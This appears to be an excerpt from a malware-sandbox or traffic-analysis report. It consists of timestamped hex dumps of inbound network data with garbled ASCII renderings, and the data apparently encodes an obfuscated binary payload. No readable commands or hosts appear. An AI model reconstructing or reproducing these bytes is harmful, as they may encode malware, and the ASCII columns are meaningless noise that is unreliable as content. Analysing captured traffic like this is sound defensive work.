                                            2022-05-13 15:18:32 UTC76INData Raw: 08 c6 c5 86 39 5f 32 ad 08 c6 c5 86 39 5f 2e ad 08 c6 c5 86 39 5f 2a ad 08 c6 c5 86 39 5f 26 ad 08 c6 c5 86 8f c5 b2 bb b7 d6 c6 ca c6 c6 3a 41 7e 3b 06 c6 46 25 51 2c c5 7f de 16 2c c5 7f da 16 c5 7f d2 16 c5 7f ce 16 ae 94 39 39 39 97 88 da c6 c5 86 8f c5 b2 7e 3b 06 c6 46 97 88 ce c6 8f c5 b2 7e 3b 06 c6 46 97 88 d2 c6 8f c5 b2 7e 3b 06 c6 46 97 88 d6 c6 8f c5 b2 30 c6 8d 6d 86 8f 2e d4 13 06 c6 2a 39 f6 2a c3 e6 bb b7 d2 c6 ca c6 c6 3a 41 f5 3b 06 c6 46 25 e6 c7 7f c2 c5 8f ce ae 63 a5 39 39 c5 7f c2 c5 8f da ae e4 70 39 39 bd a6 b9 c5 e2 bf e6 0a 08 c6 6d 86 20 93 93 2a c3 d6 2e 4f 13 06 c6 c7 7f c2 ae b1 2e 39 39 fd 23 07 9b 39 39 25 b6 c5 fd 95 93 97 88 d6 c6 c7 06 c6 8f c5 b2 30 c6 8d 6d 86 8f 2e 40 13 06 c6 2a 39 f6 2a c3 e6 bb b7 d2 c6 ca c6 c6
                                            Data Ascii: 9_29_.9_*9_&:A~;F%Q,,999~;F~;F~;F0m.*9*:A;F%c99p99m *.O.99#99%0m.@*9*
                                            2022-05-13 15:18:32 UTC84INData Raw: c5 0a ea ca c5 de 39 8d e2 25 ec c5 9a c5 8c ae 9e 22 c6 c6 4a 86 3a d4 c5 05 c5 11 c5 ca ea c5 de 39 8d de 25 45 c5 0d c5 01 c5 94 ae 55 39 39 39 20 97 99 24 95 fd 56 8d 1c c5 a0 c5 b6 2c c5 3d 49 f1 96 75 90 af d2 c5 0d c5 8c ae d5 c0 39 39 24 95 fd 2c 77 d2 06 af 4b c5 7d ce c5 96 c5 8c ae 98 39 39 39 23 2d 3b c6 c6 c5 0b bd c0 da 49 c1 80 3b c6 c6 39 ea cf f3 be 06 c6 47 33 06 c6 fe 33 06 c6 0a 33 06 c6 93 33 06 c6 34 33 06 c6 4e 33 06 c6 68 33 06 c6 82 33 06 c6 9c 33 06 c6 1c c0 06 c6 32 c0 06 c6 aa 33 06 c6 32 c0 06 c6 9b c0 06 c6 32 c0 06 c6 32 c0 06 c6 33 33 06 c6 d4 c0 06 c6 e6 c0 06 c6 f8 c0 06 c6 0a c0 06 c6 2c bd 75 3b af 53 46 77 ee 0a 08 c6 c6 3a d6 6d 98 2c 7e 3b c6 ae 1b b4 39 39 23 34 3b c6 c6 c5 8c ae f3 bc 39 39 23 28 3b c6 c6 c5 8c ae
                                            Data Ascii: 9%"J:9%EU999 $V,=Iu99$,wK}999#-;I;9G333343N3h3332322233,u;SFw:m,~;99#4;99#(;
                                            2022-05-13 15:18:32 UTC92INData Raw: 7f b6 c5 7f d2 c3 7f ba 30 41 30 c6 2e c6 ca c6 c6 c7 7f ae 16 c7 7f ae 16 db 3a 18 08 c6 c5 c6 39 96 2c c5 4d 2c f3 41 c6 ae a4 0d 39 39 c5 7f b6 c3 7f be c5 7f ba c3 7f c2 17 7f be 95 c5 1f 97 88 ce c6 8d bd 8a ae c5 9e c7 0a ea ce 16 ae 6e f9 39 39 30 41 30 c6 2e c6 ca c6 c6 8d c7 0a ea de 16 db 3a 18 08 c6 c5 c6 39 96 2c c5 4d 2c f3 41 c6 ae 5a 0d 39 39 c5 0a ea d6 c3 ca ea c5 0a ea da c3 0a ea ca 17 ca ea bd 8a de 95 fd 56 8f c5 b2 bd 8a ae 8d c5 9e c7 7f ae 16 ae 20 f9 39 39 6d 86 8f 2e 5b 53 7b c6 2a 39 f6 2a c3 e6 c5 0d c7 7f ae ae f8 a0 39 39 c7 7f ae 39 4f ea 2e 08 c6 c7 7f ae ae af c6 c6 c6 17 97 be d5 6d 86 20 93 93 2a c3 d6 2e ee 53 7b c6 c7 7f ae ae 92 9c 39 39 fd 23 80 5b 39 39 25 b6 17 7f be 95 c5 1f 97 fd 8d 1c 91 bd 8a b2 c5 c0 c5 b6 c5
                                            Data Ascii: 0A0.:9,M,A99n990A0.:9,M,AZ99V 99m.[S{*9*999O.m *.S{99#[99%
                                            2022-05-13 15:18:32 UTC100INData Raw: 41 c6 c6 c6 0a 9f 9d a3 a7 9b 32 c6 39 39 39 39 3d c6 c6 c6 ea f6 0c c6 39 39 39 39 ce c6 c6 c6 8d 2e a9 38 3a 83 34 3a c6 c6 c6 c6 39 39 39 39 ca c6 c6 c6 08 b3 3a 9f c6 c6 c6 c6 39 39 39 39 ca c6 c6 c6 91 a9 38 2a c6 c6 c6 c6 39 39 39 39 ce c6 c6 c6 12 a9 34 a1 91 a9 38 2a c6 c6 c6 c6 39 39 39 39 3f c6 c6 c6 83 34 3a fc fa c6 c6 c6 8f c5 b2 bb 8a be 37 39 39 8d 1c 91 6d 03 c3 c7 be 37 39 39 c5 b8 c5 9e 6d 86 8f 2e 98 73 7b c6 2a 39 f6 2a c3 e6 c5 35 2c bb 21 39 49 2c bd 39 da b1 dc c5 8c 49 f1 11 c5 da cf 16 0a 08 c6 ae ae ce 39 39 23 64 c6 c6 c6 2c bb 35 c6 3b af 4b c5 8c 80 ae 73 7b c6 ae 96 ce 39 39 23 4c c6 c6 c6 2c bb 35 3b 3b af d4 c5 8c 80 be 73 7b c6 ae 7e ce 39 39 25 ab c7 8f c2 c5 fd ae c2 55 c6 c6 4a 86 3a 75 c7 bf c2 c4 39 39 16 c7 cf c2 37
                                            Data Ascii: A29999=9999.8:4:9999:99998*999948*9999?4:799m799m.s{*9*5,!9I,9I99#d,5;Ks{99#L,5;;s{~99%UJ:u997
                                            2022-05-13 15:18:32 UTC108INData Raw: c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 46 1e 7b c6 d2 c6 c6 c6 8e 38 06 c6 d6 fe 06 c6 e2 fe 06 c6 e6 fe 06 c6 ea fe 06 c6 de fe 06 c6 46 6f 06 c6 62 6f 06 c6 9e 6f 06 c6 43 7f 89 32 9f 7f 38 38 a9 38 c5 86 9e 1e 7b c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 9e 1e 7b c6 d6 c6 c6 c6 fa 1e 7b c6 d6 fe 06 c6 e2 fe 06 c6 e6 fe 06 c6 ea fe 06 c6 de fe 06 c6 46 6f 06 c6 62 6f 06 c6 9e 6f 06 c6 d2 7f 89 32 9f 8d b3 ad 7f 38 38 a9 38 c7 06 c6 fa 93 7b c6 c6 c6 c6 c6 c6 c6 c6 c6 fa 93 7b c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 14 93 7b c6 de c6 c6 c6 52 1e 7b c6 d6 fe 06 c6 e2 fe 06 c6 e6 fe 06 c6 ea fe 06 c6 de fe 06 c6 46 6f 06 c6 62 6f 06 c6 9e 6f 06 c6 d4 c6 c6 c6 c6 c6 c8
                                            Data Ascii: F{8FobooC2888{{{Foboo2888{{{R{Foboo
                                            2022-05-13 15:18:32 UTC116INData Raw: 39 25 b6 99 24 95 93 97 fd c7 06 c6 8f c5 b2 30 c6 8d 1c 91 c5 33 c5 b8 c5 9e 6d 86 8f 2e 56 3e 7b c6 2a 39 f6 2a c3 e6 c7 7f c2 c5 11 ae d8 0b c4 39 c5 87 c2 c5 9c c5 fd ae 40 3b c6 c6 6d 86 20 93 93 2a c3 d6 2e d1 3e 7b c6 c7 7f c2 ae df 09 c4 39 fd 23 85 88 c4 39 25 b6 99 24 95 93 97 fd c7 06 c6 8d c5 13 c5 d0 c5 43 50 43 46 23 3f 3a 45 46 23 3f 3a 49 c4 03 3a da 25 55 c5 05 ae 06 c4 39 39 95 fd c5 05 ae e1 c4 39 39 95 fd c5 05 ae e4 39 39 39 95 fd c5 fd ae e3 8e c4 39 95 fd c7 06 c6 8d c5 e0 c5 55 50 55 46 25 3f 3a 45 46 25 3f 3a 47 c4 05 3a d6 25 4d ae f2 c4 39 39 95 fd ae e7 c4 39 39 95 fd ae 04 39 39 39 95 fd 8f c5 b2 bd 8a b2 8d 1c 6d 15 c3 97 b2 c3 87 c2 c5 a0 c5 b6 6d 86 8f 2e 21 b3 7b c6 2a 39 f6 2a c3 e6 c5 3d c5 c6 50 c6 f2 3f 3a 47 f2 3f 3a
                                            Data Ascii: 9%$03m.V>{*9*9@;m *.>{9#9%$CPCF#?:EF#?:I:%U99999999UPUF%?:EF%?:G:%M9999999mm.!{*9*=P?:G?:
                                            2022-05-13 15:18:32 UTC124INData Raw: c4 39 fd 23 62 68 c4 39 25 1d c5 7f be 24 95 c5 1f 97 fd 56 8d 1c 91 8f c5 b0 c5 be c5 01 c5 d6 39 18 da c5 9e 85 bf 15 42 da 7d 6d bc c5 9c c5 01 c5 ce 39 8b de 75 ae 3a 41 0c 85 af 29 bd 94 39 c5 8c 97 99 24 95 fd 8f c5 b2 8b 8d 1c 91 c3 87 c2 c5 c0 c5 b6 c5 87 c2 c5 11 c5 8c c5 de 39 8d 26 c5 87 ce c5 11 c5 8c c5 de 39 8d ea 99 24 95 93 97 88 ca c6 c5 86 8f c5 b2 8b 1c c5 b6 30 e6 c5 90 db 0e c1 7b c6 78 3b ae 0b d4 c6 c6 c3 7f c2 6d 86 8f 2e c2 5e 7b c6 2a 39 f6 2a c3 e6 c5 8f c2 c5 8c c5 ce 39 8b 32 6d 86 20 93 93 2a c3 d6 2e 3d d3 7b c6 c5 7f c2 ae 27 62 c4 39 fd 23 19 db c4 39 25 b6 24 93 97 fd 56 8f c5 b2 bd 8a be 8d 1c 6d 03 c3 87 be c5 a0 c3 7f c2 6d 86 8f 2e df d3 7b c6 2a 39 f6 2a c3 e6 c5 7f c2 ae 02 33 39 39 6d 86 8f 2e 4e d3 7b c6 2a 39 f6
                                            Data Ascii: 9#bh9%$V9B}m9u:A)9$9&9$0{x;m.^{*9*92m *.={'b9#9%$Vmm.{*9*399m.N{*9
                                            2022-05-13 15:18:32 UTC132INData Raw: ce c6 c6 c6 25 41 01 7f b2 43 c6 c6 c6 c5 90 46 1b 86 46 33 86 3a 59 bb a8 39 c6 c6 c6 fb b0 3d bd a8 41 c5 87 b2 fb 1b c8 c7 d2 07 d2 83 08 c6 49 f1 d2 8b 25 e4 bb a8 39 c6 c6 c6 fb b0 3d bd a8 41 c5 87 b2 fb 1b c8 c7 d2 07 d2 83 08 c6 49 f1 12 8b d6 bb 1b c6 d2 c6 c6 bb 23 c6 ca c6 c6 3a d8 bb 23 c6 ca c6 c6 3a 4d bb 23 c6 ca c6 c6 3a dc 25 e2 c5 7f c2 06 c3 7f c2 25 24 c5 7f c2 bd 86 c8 c3 7f c2 25 8d 3d b7 c2 c3 b7 c2 25 85 2c 67 60 c6 3a 4f bd 86 c0 2c bd ae ca 38 e8 2c bd ae ea 3a 4b 2c bd ae e8 af f6 3d b7 c2 bd 01 c8 c3 b7 c2 25 5f c5 7f c2 bd 86 3d c3 7f c2 25 e0 46 b7 35 c6 3a 45 c5 7f c2 bd 86 c8 c3 7f c2 25 43 c5 7f c2 bd 86 ca c3 7f c2 c5 97 c2 65 a4 6d 86 20 93 93 2a c3 d6 25 d2 23 c3 46 c4 39 6d 15 ae 28 48 c4 39 c5 fd 99 24 95 c5 1f 97 fd
                                            Data Ascii: %ACFF3:Y9=AI%9=AI#:#:M#:%%$%=%,g`:O,8,:K,=%_=%F5:E%Cem *%#F9m(H9$
                                            2022-05-13 15:18:32 UTC140INData Raw: c5 1f 97 fd 49 f9 98 ae 56 39 39 39 fd c7 06 c6 8f c5 b2 39 af d2 39 af ce bd 86 ca f3 ca c6 c6 c6 80 e6 c6 c6 c6 ae d3 6b c6 c6 97 88 ce c6 56 8d 1c 91 4a 98 3a ce bd 8a b6 ae 0b 99 c4 39 c5 2b c5 a0 c5 be 6d 98 c5 01 ae f4 97 c4 39 c7 91 ca c5 8c f3 e8 c6 c6 c6 ae 35 8d c4 39 c5 01 4a 15 3a 49 ae c6 26 c4 39 2a c9 3f c6 c6 c6 c6 bd 8a d2 c5 01 99 24 95 fd 8f c5 b2 bd 8a 72 8d 1c 91 6d 15 c3 97 72 c3 97 76 c3 97 7a 4a 98 3a ce bd 8a b6 ae 3e 99 c4 39 c5 13 4e 8f 39 c5 be c5 af ce 6d 86 8f 2e bf 13 7b c6 2a 39 f6 2a c3 e6 2c bf 15 3a 45 2c bd 35 06 b1 3f 2c 75 a4 ad 4f c7 8f 7a db 66 8b 08 c6 ae 15 4e c4 39 c5 7f 7a ae 8d c2 39 39 17 7f d2 bd 8a ba 15 02 ea d5 c7 7f 76 16 49 f1 94 49 f1 0d 76 c8 ae 72 82 c4 39 c5 7f 76 c7 8f 17 ae d7 ca c6 c6 1c c7 8f f5
                                            Data Ascii: IV99999kVJ:9+m959J:I&9*?$rmrvzJ:>9N9m.{*9*,:E,5?,uOzfN9z99vIIvr9v
                                            2022-05-13 15:18:32 UTC148INData Raw: 6d 03 80 e6 c6 c6 c6 ae 82 71 c4 39 c5 7f ba 46 fe f6 af 43 39 7f ba 2c bf 15 3c 3b 85 c5 7f ba ae 75 56 c4 39 c5 be 2c bd 39 06 3c 51 2c bf 15 3c d2 2c bd 35 06 b1 cc 2c f9 06 c6 25 cc c5 01 4e cc 25 18 2c bf 39 3c d6 c5 7f be 16 c5 7f ba 16 91 ae ef 37 39 39 25 41 8c cc d0 8c 0c 3b c8 2c bf 15 3c 57 c5 01 c5 96 10 4e dc 46 b7 c4 c6 3a 43 f0 fd ca 46 4e 0c 3b 25 55 f0 fd 4e 0c 3b 25 da c5 01 4e cc 46 b7 c4 c6 3a cc 8c 0c 3b 46 25 ca 8c 0c 3b c6 6d 86 20 93 93 2a c3 d6 2e 29 be 7b c6 c7 7f b6 ae d7 0e c4 39 fd 23 2d 7b c4 39 25 b6 50 7f 39 99 24 95 c5 1f 97 fd c6 c6 c6 39 39 39 39 3b c6 c6 c6 f6 c6 c6 c6 8f c5 b2 8b 1c 8d c5 af d2 2c c5 87 ce c2 2c bd 33 c6 3a e6 72 02 c6 af d6 2c bd 23 3b 2c bd 33 c6 3a 4b 2c bd 23 3b 25 1f 86 ae ca 02 c6 af ca 2c bd 23
                                            Data Ascii: mq9FC9,<;uV9,9<Q,<,5,%N%,9<799%A;,<WNF:CFN;%UN;%NF:;F%;m *.){9#-{9%P9$9999;,,3:r,#;,3:K,#;%,#
                                            2022-05-13 15:18:32 UTC156INData Raw: 39 25 b9 c5 8f b6 c5 7f b2 ae a8 f4 c4 39 c5 9e bf 15 af d2 c5 8c c5 8f ae ae b8 65 c4 39 25 32 39 fc c7 7f aa 16 c5 05 83 80 3b c6 c6 c6 c5 7f ae ae f8 f4 c4 39 39 af aa 39 af ba c5 8c 80 3d c6 c6 c6 ae 46 f2 c4 39 c7 7f ae 16 c5 7f be ae 7a 65 c4 39 c5 96 3d 0d f3 39 39 39 b9 c5 7f ae ae 3d f4 c4 39 c7 7f b6 16 c5 7f b2 ae d1 65 c4 39 c5 96 3d 0d f3 39 39 39 b9 c5 7f b6 ae ac 67 c4 39 bd b7 b6 c6 49 bf b1 39 39 39 6d 86 20 93 93 2a c3 d6 2e b0 de 08 c6 c7 7f aa 80 41 c6 c6 c6 ae 8c ee c4 39 fd 23 be 5b c4 39 25 25 24 95 c5 1f 97 88 ca c6 c5 86 8f c5 b2 bd 8a be c3 8f be c3 7f c2 c5 7f c2 ae f2 67 c4 39 c5 7f be ae ea 67 c4 39 6d 86 8f 2e 46 53 08 c6 2a 39 f6 2a c3 e6 30 c6 c5 7f be ae e2 67 c4 39 16 ae e0 89 c4 39 dd 9a 2e 08 c6 c5 7f c2 ae 43 65 c4 39
                                            Data Ascii: 9%9e9%29;999=F9ze9=999=9e9=999g9I999m *.A9#[9%%$g9g9m.FS*9*0g99.Ce9
                                            2022-05-13 15:18:32 UTC164INData Raw: 39 39 39 39 3d c6 c6 c6 7d 38 b3 c6 39 39 39 39 ca c6 c6 c6 36 3a 1c 9f c6 c6 c6 c6 39 39 39 39 ca c6 c6 c6 a1 34 9b 3a c6 c6 c6 c6 39 39 39 39 c8 c6 c6 c6 6d f8 c6 c6 39 39 39 39 cc c6 c6 c6 38 a3 2c b3 8d a3 c6 c6 39 39 39 39 ca c6 c6 c6 af 38 9f 7b c6 c6 c6 c6 39 39 39 39 c8 c6 c6 c6 b1 af c6 c6 0a 32 32 7d 9b 34 8f 34 32 a9 9b 2a 14 a9 b1 c6 0a 32 32 81 9f 3a 7d 32 9b ad ad 89 28 30 9f 9d 3a c6 c6 c6 0a 32 32 18 9f a1 a3 ad 3a 9f 38 8d 9f 38 3c 9f 38 c6 c6 c6 0a 32 32 8f 34 38 9f a1 a3 ad 3a 9f 38 8d 9f 38 3c 9f 38 c6 39 39 39 39 3b c6 c6 c6 38 c6 c6 c6 39 39 39 39 3b c6 c6 c6 af c6 c6 c6 39 39 39 39 3b c6 c6 c6 32 c6 c6 c6 39 39 39 39 3d c6 c6 c6 83 34 9f c6 39 39 39 39 41 c6 c6 c6 89 2c 2c 32 a3 34 9f c6 39 39 39 39 3d c6 c6 c6 3a 83 ad c6 39 39 39
                                            Data Ascii: 9999=}899996:99994:9999m99998,99998{999922}442*22:}2(0:22:88<82248:88<89999;89999;9999;29999=49999A,,249999=:999
                                            2022-05-13 15:18:32 UTC180INData Raw: 1a 75 ab 75 df 75 84 75 0f 75 d6 02 75 02 44 02 d5 02 0b 02 27 02 2b 02 2f 02 33 02 37 02 3b 77 3f 77 43 77 47 77 4b 77 4f 77 53 77 57 77 5b 77 5f 77 63 77 67 77 6b 77 6f 77 73 77 77 77 7b 77 8d 77 a5 77 a3 79 a7 79 ab 79 af 79 b3 79 b7 79 bb 79 bf 79 c3 79 c7 79 cb 79 cf 79 d3 79 d7 79 db 79 df 79 e3 79 e7 79 eb 79 ef 79 f3 79 f7 79 c6 f6 3b c6 0a c6 c6 c6 cb 6b 5f f8 04 f8 a3 f8 fd f8 57 6d b5 6d 90 6d 4f fa 5d fa 91 fc 44 fc 8e fe 21 fe 39 fe 51 73 4c 73 d7 73 76 73 88 73 42 00 fd 00 98 00 b6 00 f6 77 93 77 fb 77 69 04 f6 79 d1 79 c6 06 3b c6 82 c6 c6 c6 ce 6b 96 6b 50 f8 d3 f8 e1 f8 47 6d 10 6d c9 6d cd 6d d1 6d d5 6d d9 6d dd 6d e1 6d e5 6d e9 6d ed 6d f1 6d f5 6d 5c 6f ed 6f 82 6f 09 6f 4f fc 0c fc ff fc e4 71 e8 71 ec 71 f0 71 f4 71 f8 71 fc 71 00
                                            Data Ascii: uuuuuuD'+/37;w?wCwGwKwOwSwWw[w_wcwgwkwowswww{wwwyyyyyyyyyyyyyyyyyyyyyy;k_WmmmO]D!9QsLssvssBwwwiyy;kkPGmmmmmmmmmmmmmm\ooooOqqqqqqq
                                            2022-05-13 15:18:32 UTC196INData Raw: ce d9 a2 3f 19 9c 22 09 ee f1 4b 63 a7 99 8e ac 47 40 3f 64 a5 6b 74 e8 2b 95 9d c7 fc 0d c5 2b 3e bc 03 1a 8a f4 bb d2 1a 29 67 72 75 f0 97 33 3d 34 cd 23 4a 15 79 83 e2 57 e7 e6 a7 a3 8d ac bd 7b c9 48 e4 f1 43 f0 25 11 0d 80 e2 b0 b8 b2 58 3d 44 00 6f cc 78 76 4b 3b 80 1a 41 e3 b6 8b b6 17 ef b5 a2 3a de 8e 94 c7 9b 53 a0 c8 1d 3e 06 22 72 f7 32 43 70 5a 1f 29 4f 2c f3 bd 09 66 2e ca ec 95 f4 aa 95 57 51 58 24 6e 68 e6 af ec 7f 49 f0 8f 40 7b be d8 f5 7b d2 90 99 b5 e6 85 b7 88 a2 77 74 9c b7 67 29 f0 bc 69 24 7c d4 41 1e 38 50 12 df db ad a6 25 5c bf 2d 3f 8f d6 68 8c 77 44 b7 c5 36 fd 47 a1 4b c2 a2 b5 11 a6 f5 8f ee 06 4e 4c ac 09 25 cd 04 00 81 a5 24 8c f6 80 2f cf 8a 81 5b a6 31 75 b8 a9 55 8e aa ce 8d cb f8 d6 75 f3 ca c2 0c 1c d0 04 53 a8 9e 51
                                            Data Ascii: ?"KcG@?dkt++>)gru3=4#JyW{HC%X=DoxvK;A:S>"r2CpZ)O,f.WQX$nhI@{{wtg)i$|A8P%\-?hwD6GKNL%$/[1uUuSQ
                                            2022-05-13 15:18:32 UTC212INData Raw: f3 fe c9 20 aa 77 f8 ba d9 f1 ce 0f f7 dc 47 e6 2c f4 97 34 8c 0c ee 54 f9 2b 44 f1 9c f5 b6 da 02 34 ab e0 9a 25 ab be ba 01 4e 29 e9 08 f0 d6 fe 46 cd 99 88 92 7c 30 08 5a 51 0f c9 e2 c9 b1 bd 32 1f 03 ed 7d d4 16 45 57 5b dc 77 79 f4 82 f0 ec da 1a fc 33 71 99 d4 eb 09 1d 03 69 9c 78 6f 2e 54 dc f2 d1 f2 38 bb 88 54 a7 74 53 20 3a a4 54 74 8e af d5 2c 7b 39 ca 9a 61 6e 5a 38 77 cf c5 1f 74 51 66 1d c7 35 c1 e4 f1 59 03 25 b9 ec e2 c2 cd 75 6e 8f 2f 61 59 71 83 25 eb 7d d1 09 58 20 d2 55 0b d8 4a 96 bd 34 39 8f ba c0 97 bf 89 fa 4c ca 5a 42 c9 4d d8 f3 cf 29 b3 b2 6d d7 ee 6d e9 b9 01 de 6e 1a 1b b4 c0 f7 cc 5f 9b db b9 56 d6 6e 1a 02 a7 74 94 a7 60 6a 94 2c 1f 4f fa b9 7d ff e6 d7 d2 89 47 ee 71 b0 cc b4 5b 35 39 cb c5 1e c3 90 3c 27 5d 2c 67 21 6f 79
                                            Data Ascii: wG,4T+D4%N)F|0ZQ2}EW[wy3qixo.T8TtS :Tt,{9anZ8wtQf5Y%un/aYq%}X UJ49LZBM)mmn_Vnt`j,O}Gq[59<'],g!oy
                                            2022-05-13 15:18:32 UTC228INData Raw: bd 42 2c 87 c1 73 25 89 f9 44 d8 da 86 e0 2c 8a 99 7f f3 65 7e e6 7c 31 a1 5f 24 39 06 62 9b 10 a8 2b 10 75 d5 f6 41 8f 60 6c 13 7c 4a d6 49 5b bd 0c 1e a7 c6 68 fb b4 fc 51 f6 58 60 48 c6 b0 23 71 85 3a c0 c9 e9 7c 24 ba 69 e3 21 6b 18 29 f8 b1 f5 79 2f ee cc a0 a2 11 72 8d cd 1e 2f 4c 8f 8c cb ca 2b a5 b5 e6 9e 94 63 39 e3 9d 73 d8 38 b2 87 e0 40 cb 7c dc 6b 90 e8 67 29 2b 82 d8 ba 3e 95 63 fa 55 2a 80 ef d7 e7 8a f2 45 2a d9 2c 9d 5f 43 52 ee 89 5e b0 76 4f 51 50 5e f9 21 46 f4 d3 df fd 34 93 bb 66 1d 43 ea 6c 28 e8 24 ef 09 2a 50 a6 54 88 52 76 07 d5 fc 24 33 6e cd 93 e9 cb d3 f6 8b f2 f8 4c e1 b4 81 5b 16 ed ab 8c 6b e3 25 7f f9 b4 83 ae a0 43 b9 e9 d4 a5 7f a5 75 d3 c4 ab 82 cc 47 a8 b8 f4 12 90 bb 74 5e 56 f2 f8 b9 d8 b5 f6 1f f1 5b 0d 88 7d 77 5a
                                            Data Ascii: B,s%D,e~|1_$9b+uA`l|JI[hQX`H#q:|$i!k)y/r/L+c9s8@|kg)+>cU*E*,_CR^vOQP^!F4fCl($*PTRv$3nL[k%CuGt^V[}wZ
                                            2022-05-13 15:18:32 UTC244INData Raw: 3d e4 5c e4 41 41 ce 89 51 f2 25 5d 58 0b 88 a7 49 62 8a 2a c1 fb 5f 61 5d 10 06 95 2a 97 b1 9a a2 1c 34 ff bf e0 4d bb 37 3f 4d 1c 59 f6 40 5f 40 c5 0a 92 16 36 54 11 c3 21 28 46 cc 3f bd b0 3c e0 c5 be a9 07 8c 64 b1 e8 4d 36 13 21 86 d6 a2 f4 4b 65 c0 d8 16 59 46 90 d9 ec 3e c6 b7 03 1d a2 4f ff 78 b3 41 42 ae e2 ec 88 8c 54 31 a5 94 9c c4 45 14 86 30 e6 a0 21 e4 b1 a2 69 2b 8a 8f 63 9e e6 0a c3 c6 c8 c7 ae 52 4b 59 ee af a9 5d c9 53 c8 c5 3b 41 49 d0 10 45 3e e4 31 09 5f 3f bb 0b 32 c7 8e 3a 5f b3 55 fa 8f 8b 65 f3 18 a1 18 32 a0 b7 af b5 38 b8 ed 6a c1 ca 3f d9 23 ca e2 a5 3f 3c b7 38 b7 58 a9 fb 9c 95 01 60 33 c5 e2 3b bd b6 de 3c c6 44 1b 5b 9c 63 d4 b5 9b aa 92 ff ea 57 63 a8 60 2d a7 43 63 15 b1 c6 b7 24 1d 19 17 5d 2b e4 f9 3e 47 a9 b8 9f 33 ff
                                            Data Ascii: =\AAQ%]XIb*_a]*4M7?MY@_@6T!(F?<dM6!KeYF>OxABT1E0!i+cRKY]S;AIE>1_?2:_Ue28j?#?<8X`3;<D[cWc`-Cc$]+>G3
                                            2022-05-13 15:18:32 UTC260INData Raw: 9e 38 88 30 75 82 03 5d 4a e0 50 d7 75 61 39 c4 40 3f dc 50 51 63 3b 58 35 a5 c3 8a 0d 69 3b 36 33 9a f6 cd 07 9f 3b 50 92 d9 2d b1 90 a0 ee 1e 19 24 98 86 e6 3d 9a b7 5f b1 ad a4 37 57 0f 38 b1 40 b5 88 93 11 88 b4 e0 40 24 da 88 59 ad 19 8a 63 a4 9b 8e 7b 6d 56 41 61 ca 64 c2 8c 38 3d fc ff 1c 1e 13 9f d4 bd 09 46 1b 2e 19 8a af 30 01 69 9c 26 bf 53 6b 8a e0 cc 59 f6 bd 98 61 3c ac 5f 6f 9b a3 c5 03 e8 e8 5d 7d 88 78 40 ee 27 ae 12 9d b7 5d ee 06 74 70 34 67 92 7a a5 1e 64 a2 40 36 31 07 00 93 22 5f 61 ee 0a 90 eb a3 32 47 38 37 20 d7 07 2f 3d 8e 36 f6 c0 e0 85 9b 63 b5 40 0a 76 84 1a 61 01 f5 a1 b1 f4 ba d2 83 9d ad 44 ec 04 94 e1 20 36 16 68 1c 32 cb 88 a9 b5 ae ff 6f 2c f2 ee 42 0c 6c 6a 91 20 97 55 58 aa 0b d5 05 34 11 13 ab 38 1b 66 73 8b 65 36 5b
                                            Data Ascii: 80u]JPua9@?PQc;X5i;63;P-$=_7W8@@$Yc{mVAad8=F.0i&SkYa<_o]}x@']tp4gzd@61"_a2G87 /=6c@vaD 6h2o,Blj UX48fse6[
                                            2022-05-13 15:18:32 UTC276INData Raw: 07 8d d1 8a b0 4a 9a ea f6 2c d1 6b 97 9b 2a a3 a7 b5 af 3c e3 92 84 ab ea ea b1 d8 8d 77 a1 f3 b1 e4 a2 18 0f ff af b5 d0 8b 0e 61 38 3e eb 98 88 45 fa 35 88 ea be 90 95 a5 4e 39 63 ad 40 f1 7c f7 b3 ec a9 5f 4b b7 27 34 8d 3e f4 2a 4b 63 88 f2 01 30 c0 b0 89 0a a8 4f 7c f8 2e 0f ab c7 de 85 fd 45 b3 5d ab ab 58 4f d6 18 cb ff b1 3e 66 9f 6d f4 f6 b5 30 64 8c 8b f4 bb 96 36 d0 61 3c cc ba 6f 9b 19 40 f9 9d 81 03 f9 36 e2 fa 71 4e 05 ea ee 38 f4 f5 a2 ea f6 da 01 6b 8b a1 9b 5d f6 36 3e e9 88 2a 3f 03 ee 21 fd b1 77 69 17 75 3d 64 37 8a 86 a3 09 4d 38 36 f6 26 d7 f2 e2 f6 40 ea 40 52 5f 44 3d 50 fd 45 13 1e 46 9d 5f 30 8e 2f 41 38 7d 58 b0 32 3b a2 34 0f 9a bb 38 a5 c9 92 b5 ec ae 11 85 8b 5f 61 5d 65 0e a3 a7 22 b3 53 fd 20 8d 13 8f d4 50 09 9d c9 a4 af
                                            Data Ascii: J,k*<wa8>E5N9c@|_K'4>*Kc0O|.E]XO>fm0d6a<o@6qN8k]6>*?!wiu=d7M86&@@R_D=PEF_0/A8}X2;48_a]e"S P
                                            2022-05-13 15:18:32 UTC292INData Raw: 8d 7b 11 68 91 d2 8d 8a 6c 24 28 19 b1 36 5a 1a 85 99 1e c3 f6 93 36 40 b7 d0 98 f7 40 3c b1 51 01 05 5b ee f6 e2 f7 07 b5 38 a9 b6 a2 28 58 a2 30 c1 11 40 42 78 56 71 20 95 2a 5f fb 70 ab 45 9d 38 b1 af d2 86 e1 b1 3e b7 ee d8 93 08 24 ef b1 01 8a b5 ec f4 4b a4 a3 cd a2 b4 c5 a2 e8 61 62 5f b9 e6 32 a3 94 05 3c 94 f1 24 38 f6 ad 9f 51 ec b5 cb 91 0e 1e 44 42 c5 07 10 e6 9b 44 d0 8b 15 8a 3e 40 7c d3 06 8b 2a 49 19 1c 80 40 c1 9a af a9 4e 2d f8 a3 a3 d2 5d ca ac 5e 05 af ee 7e 5e 0e ee 17 0f dc 1e 8d 48 5b ce ca 84 26 59 ee 51 b1 ac a2 18 41 ff af b5 5e 95 0e 44 9e 15 d4 3c 1a 17 1e 42 40 3c 15 d5 4a 19 44 65 f0 0a e7 66 38 b1 58 ea 02 5d b1 3e 3f 5b b5 b7 e2 92 c9 b5 c6 44 d2 5d f2 ee 51 86 62 e8 ca 3c 3d e8 61 3e 51 a0 c1 f6 da 5d 3b ad 42 3a 57 94 58
                                            Data Ascii: {hl$(6Z6@@<Q[8(X0@BxVq *_pE8>$Kab_2<$8QDBD>@|*I@N-]^~^H[&YQA^D<B@<JDef8X]>?[D]Qb<=a>Q];B:WX
